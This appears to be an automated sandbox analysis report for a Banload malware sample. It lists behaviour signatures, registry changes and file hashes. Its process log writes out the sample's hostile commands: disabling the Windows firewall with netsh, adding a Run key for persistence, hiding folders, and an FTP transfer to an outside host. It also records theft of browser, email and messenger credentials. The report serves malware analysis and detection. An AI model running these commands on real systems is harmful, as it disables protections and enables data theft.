Analysis Overview
SHA256
1761f7de2e6b4f406c6775556927bc7338f5b9100ebe42b4f24a528da0657e1d
Threat Level: Known bad
The file caeba64e32c608801103505e9258d6a9_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks computer location settings
Reads user/profile data of local email clients
Checks BIOS information in registry
Reads local data of messenger clients
Accesses Microsoft Outlook accounts
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Gathers network information
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Modifies registry class
Enumerates system info in registry
NTFS ADS
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-08-30 13:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-30 13:19
Reported
2024-08-30 13:21
Platform
win7-20240704-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\OUTLOOK.EXE\"" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\Class = "Microsoft.Office.Interop.Outlook.OlkLabelClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Typelib\ = "{00062FFF-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version\ = "9.4" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Control | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "Outlook.OlkLabel.1" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocHandler32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Office.Interop.Outlook, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Microsoft Outlook Label Control" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocHandler32\ = "ole32.dll" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\14.0.0.0\Assembly = "Microsoft.Office.Interop.Outlook, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Office.Interop.Outlook.OlkLabelClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32\ = "C:\\PROGRA~2\\MICROS~1\\Office14\\OUTLOOK.EXE,5502" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "Outlook.OlkLabel" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Typelib | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
memory/2744-73-0x0000000000A90000-0x0000000000A92000-memory.dmp
memory/2624-74-0x0000000000190000-0x0000000000192000-memory.dmp
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 8e6e9290ff877feff5541cec9023f670 |
| SHA1 | 64af5a9d7740c1dfc9407fcc14e1e6c5484ceffd |
| SHA256 | 503b2f2582bf2efb3d9cd446648819814037e6c7d88bb178d178048dd42dacc7 |
| SHA512 | 03f85e8efc7d73f3b3eb2e6c45bf6056f4e8a2ccb1a99f83656bca1cb0b3b6a1685846b760f88e90ec9c8ce8c08571742adfd3694b9f3cc1ab002e22117c8193 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 9acfede263e82a5d2c3e433f65a034a9 |
| SHA1 | 8eac20b714691232eebb777fd1b99d456201551a |
| SHA256 | 7705dcf5bc1484a398aab305e71e56ab9683f28b2c8e00c556bdefa21c25b15d |
| SHA512 | 5b61b43bd15fe2d53c9cb48e00d3d340e5866b349b686e1de813b01ec541bc7716105b0267a31c8d3b260cfc0b4d2e8896acdaba83b6bf7b5bfe11673a2bf3f1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 9091783550da66165530d1c5c90c1043 |
| SHA1 | 5e1831a2fd9eaf331dec4895016ab5c1ebbd9443 |
| SHA256 | 2bd538ee374c558e75d3e10f2051c42bde134ee7fe9539980ad7ab1147f9083e |
| SHA512 | c0d6e54f6a4e8e2e9213ffe38582b86eb7abc83047d4f64b03c75aaadcc289a9bbc1ec1c0d3d10751053f6096039b2206c6e385465903695a68f0ae6fc6a55d4 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
memory/2388-131-0x0000000000400000-0x0000000000709000-memory.dmp
